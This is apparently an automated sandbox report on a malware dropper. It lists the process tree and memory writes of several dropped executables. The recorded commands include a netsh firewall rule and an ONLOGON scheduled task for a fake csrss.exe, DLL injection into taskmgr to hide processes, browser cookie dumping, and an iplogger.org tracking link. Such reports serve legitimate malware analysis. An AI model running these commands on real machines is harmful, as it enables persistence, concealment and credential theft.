4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exeFolder.exemsedge.exeFiles.exeInstall.execmd.exerUNdlL32.eXedescription pid process target process PID 1564 wrote to memory of 2364 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe Updbdate.exe PID 1564 wrote to memory of 2364 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe Updbdate.exe PID 1564 wrote to memory of 2364 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe Updbdate.exe PID 1564 wrote to memory of 3816 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe Info.exe PID 1564 wrote to memory of 3816 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe Info.exe PID 1564 wrote to memory of 3816 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe Info.exe PID 1564 wrote to memory of 4892 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe Folder.exe PID 1564 wrote to memory of 4892 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe Folder.exe PID 1564 wrote to memory of 4892 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe Folder.exe PID 1564 wrote to memory of 2060 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe md9_1sjm.exe PID 1564 wrote to memory of 2060 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe md9_1sjm.exe PID 1564 wrote to memory of 2060 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe md9_1sjm.exe PID 1564 wrote to memory of 1468 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe Install.exe PID 1564 wrote to memory of 1468 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe Install.exe PID 1564 wrote to memory of 1468 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe Install.exe PID 1564 wrote to memory of 1392 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe File.exe PID 1564 wrote to memory of 1392 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe File.exe PID 1564 wrote to memory of 1392 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe File.exe PID 4892 wrote to memory of 3596 4892 Folder.exe Folder.exe PID 4892 wrote to memory of 3596 4892 Folder.exe Folder.exe PID 4892 wrote to memory of 3596 4892 Folder.exe Folder.exe PID 1564 wrote to memory of 4032 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe pub2.exe PID 1564 wrote to memory of 4032 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe pub2.exe PID 1564 wrote to memory of 4032 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe pub2.exe PID 1564 wrote to memory of 4564 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe WerFault.exe PID 1564 wrote to memory of 4564 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe WerFault.exe PID 1564 wrote to memory of 4564 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe WerFault.exe PID 1564 wrote to memory of 5060 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe Files.exe PID 1564 wrote to memory of 5060 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe Files.exe PID 1564 wrote to memory of 5060 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe Files.exe PID 1564 wrote to memory of 1288 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe KRSetp.exe PID 1564 wrote to memory of 1288 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe KRSetp.exe PID 1564 wrote to memory of 1380 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe msedge.exe PID 1564 wrote to memory of 1380 1564 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe msedge.exe PID 1380 wrote to memory of 852 1380 msedge.exe msedge.exe PID 1380 wrote to memory of 852 1380 msedge.exe msedge.exe PID 5060 wrote to memory of 3840 5060 Files.exe jfiag3g_gg.exe PID 5060 wrote to memory of 3840 5060 Files.exe jfiag3g_gg.exe PID 5060 wrote to memory of 3840 5060 Files.exe jfiag3g_gg.exe PID 1468 wrote to memory of 236 1468 Install.exe cmd.exe PID 1468 wrote to memory of 236 1468 Install.exe cmd.exe PID 1468 wrote to memory of 236 1468 Install.exe cmd.exe PID 236 wrote to memory of 4424 236 cmd.exe taskkill.exe PID 236 wrote to memory of 4424 236 cmd.exe taskkill.exe PID 236 wrote to memory of 4424 236 cmd.exe taskkill.exe PID 3504 wrote to memory of 936 3504 rUNdlL32.eXe WerFault.exe PID 3504 wrote to memory of 936 3504 rUNdlL32.eXe WerFault.exe PID 3504 wrote to memory of 936 3504 rUNdlL32.eXe WerFault.exe PID 1380 wrote to memory of 3112 1380 msedge.exe msedge.exe PID 1380 wrote to memory of 3112 1380 msedge.exe msedge.exe PID 1380 wrote to memory of 3112 1380 msedge.exe msedge.exe PID 1380 wrote to memory of 3112 1380 msedge.exe msedge.exe PID 1380 wrote to memory of 3112 1380 msedge.exe msedge.exe PID 1380 wrote to memory of 3112 1380 msedge.exe msedge.exe PID 1380 wrote to memory of 3112 1380 msedge.exe msedge.exe PID 1380 wrote to memory of 3112 1380 msedge.exe msedge.exe PID 1380 wrote to memory of 3112 1380 msedge.exe msedge.exe PID 1380 wrote to memory of 3112 1380 msedge.exe msedge.exe PID 1380 wrote to memory of 3112 1380 msedge.exe msedge.exe PID 1380 wrote to memory of 3112 1380 msedge.exe msedge.exe PID 1380 wrote to memory of 3112 1380 msedge.exe msedge.exe PID 1380 wrote to memory of 3112 1380 msedge.exe msedge.exe PID 1380 wrote to memory of 3112 1380 msedge.exe msedge.exe PID 1380 wrote to memory of 3112 1380 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe"C:\Users\Admin\AppData\Local\Temp\4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 3683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 3723⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 3723⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 6603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 6603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 7123⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 7323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 7403⤵
- Executes dropped EXE
- Program crash
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 6883⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 8683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 8843⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 6083⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 6003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 6603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 8043⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 9123⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 6043⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 7203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 8643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 6283⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 8803⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 3324⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 3364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 3364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 5884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 6684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 6684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 6684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 7004⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 7244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 5724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 8164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 7124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 8364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 6964⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 8484⤵
- Program crash
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 6964⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 7524⤵
- Program crash
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /94-944⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 3685⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 3725⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 3725⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 6525⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 6565⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 6565⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 7365⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 7445⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 7645⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 7165⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 8165⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 8965⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 8965⤵
- Program crash
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 9445⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 8685⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 8685⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 10085⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 9725⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 7525⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 11245⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 11365⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 9885⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 10805⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 10325⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 11725⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 11645⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 9445⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 8243⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\File.exe"C:\Users\Admin\AppData\Local\Temp\File.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\sHHgfnWbYrhYH15l5vk6FQMv.exe"C:\Users\Admin\Pictures\Adobe Films\sHHgfnWbYrhYH15l5vk6FQMv.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 23043⤵
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\jamesold.exe"C:\Users\Admin\AppData\Local\Temp\jamesold.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rPS672⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff8b5346f8,0x7fff8b534708,0x7fff8b5347183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5296 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6324 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x22c,0x230,0x234,0x208,0x238,0x7ff7c0c15460,0x7ff7c0c15470,0x7ff7c0c154804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6324 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6944 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3824 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3900 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7080 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6332 /prefetch:23⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3816 -ip 38161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3816 -ip 38161⤵
-
